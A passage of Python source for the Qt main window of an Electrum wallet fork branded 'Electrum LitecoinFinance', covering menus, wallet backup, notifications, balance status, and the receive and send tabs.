msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
def backup_wallet(self):
d = WindowModalDialog(self, _("File Backup"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
backup_help = ""
backup_dir = self.config.get('backup_dir')
backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
msg = _('Please select a backup directory')
if self.wallet.has_lightning() and self.wallet.lnworker.channels:
msg += '\n\n' + ' '.join([
_("Note that lightning channels will be converted to channel backups."),
_("You cannot use channel backups to perform lightning payments."),
_("Channel backups can only be used to request your channels to be closed.")
])
self.backup_dir_e = QPushButton(backup_dir)
self.backup_dir_e.clicked.connect(self.select_backup_dir)
grid.addWidget(backup_dir_label, 1, 0)
grid.addWidget(self.backup_dir_e, 1, 1)
vbox.addLayout(grid)
vbox.addWidget(WWLabel(msg))
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return False
backup_dir = self.config.get_backup_dir()
if backup_dir is None:
self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not configured"))
return
try:
new_path = self.wallet.save_backup(backup_dir)
except BaseException as reason:
self.show_critical(_("Electrum LitecoinFinance was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
return
msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
self.show_message(msg, title=_("Wallet backup created"))
return True
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
requests_menu = wallet_menu.addMenu(_("Requests"))
requests_menu.addAction(_("Import"), lambda: self.import_requests())
requests_menu.addAction(_("Export"), lambda: self.export_requests())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu
preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction
if sys.platform == 'darwin':
# "Settings"/"Preferences" are all reserved keywords in macOS.
# preferences_action will get picked up based on name (and put into a standardized location,
# and given a standard reserved hotkey)
# Hence, this menu item will be at a "uniform location re macOS processes"
preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
# Add another preferences item, to also have a "uniform location for Electrum between different OSes"
tools_menu.addAction(_("Electrum LitecoinFinance preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
if self.network and self.network.local_watchtower:
tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog)
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://ltfn.scalaris.info"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
if not constants.net.TESTNET:
help_menu.addAction(_("&Bitcoin Paper"), self.show_bitcoin_paper)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('litecoinfinance:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum-LTFN",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_bitcoin_paper(self):
filename = os.path.join(self.config.path, 'bitcoin.pdf')
if not os.path.exists(filename):
s = self._fetch_tx_from_network("54e48e5f5c656b26c3bca14a8c95aa583d07ebe84dde3b7dd4a78f4e4186e713")
if not s:
return
s = s.split("0100000000000000")[1:-1]
out = ''.join(x[6:136] + x[138:268] + x[270:400] if len(x) > 136 else x[6:] for x in s)[16:-20]
with open(filename, 'wb') as f:
f.write(bytes.fromhex(out))
webopen('file:///' + filename)
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum LitecoinFinance (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum LitecoinFinance - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
total_amount += tx_wallet_delta.delta
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum LitecoinFinance", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum LitecoinFinance", message, QSystemTrayIcon.Information, 20000)
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, amount_sat, is_diff=False, whitespaces=False) -> str:
"""Formats amount as string, converting to desired unit.
E.g. 500_000 -> '0.005'
"""
return self.config.format_amount(amount_sat, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount_sat, *, timestamp: int = None) -> str:
"""Returns string with both bitcoin and fiat amounts, in desired units.
E.g. 500_000 -> '0.005 BTC (191.42 EUR)'
"""
text = self.config.format_amount_and_units(amount_sat)
fiat = self.fx.format_amount_and_units(amount_sat, timestamp=timestamp) if self.fx else None
if text and fiat:
text += f' ({fiat})'
return text
def format_fiat_and_units(self, amount_sat) -> str:
"""Returns string of FX fiat amount, in desired units.
E.g. 500_000 -> '191.42 EUR'
"""
return self.fx.format_amount_and_units(amount_sat) if self.fx else ''
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance") + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.has_lightning():
l = self.wallet.lnworker.get_balance()
text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
if self.tray:
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
if self.status_button:
self.status_button.setIcon(icon)
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.channels_list.update_rows.emit(wallet)
self.update_completions()
def create_channels_tab(self):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
tab = self.create_list_tab(l, toolbar)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return tab
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ''.join([
_('Expiration date of your request.'), ' ',
_('This information is seen by the recipient if you send them a signed payment request.'),
'\n\n',
_('For on-chain requests, the address gets reserved until expiration. After that, it might get reused.'), ' ',
_('The bitcoin address never expires and will always be part of this electrum wallet.'), ' ',
_('You can reuse a bitcoin address any number of times but it is not good for your privacy.'),
'\n\n',
_('For Lightning requests, payments will not be accepted after the expiration.'),
])
grid.addWidget(HelpLabel(_('Expires after') + ' (?)', msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('New Address'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.setToolTip('Create on-chain request')
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_invoice_button.setText(_('New Address'))
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setToolTip('Create lightning request')
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Receive queue'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
receive_tabs_sp = receive_tabs.sizePolicy()
receive_tabs_sp.setRetainSizeWhenHidden(True)
receive_tabs.setSizePolicy(receive_tabs_sp)
def maybe_hide_receive_tabs():
receive_tabs.setVisible(bool(self.receive_payreq_e.text()))
self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs)
maybe_hide_receive_tabs()
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(receive_tabs)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
if is_lightning:
if not self.wallet.lnworker.channels:
self.show_error(_("You need to open a Lightning channel first."))
return
# TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy)
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
if not key:
return
self.address_list.update()
assert key is not None
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
# copy to clipboard
r = self.wallet.get_request(key)
content = r.invoice if r.is_lightning() else r.get_address()
title = _('Invoice') if is_lightning else _('Address')
self.do_copy(content, title=title)
def create_bitcoin_request(self, amount, message, expiration) -> Optional[str]:
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic(): # imported wallet
msg = [
_('No more addresses in your wallet.'), ' ',
_('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
_('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
_('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
]
if not self.question(''.join(msg)):
return
addr = self.wallet.get_receiving_address()
else: # deterministic wallet
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
self.payto_e.addPasteButton(self.app)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = FreezableLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay") + "...", self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Send queue'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
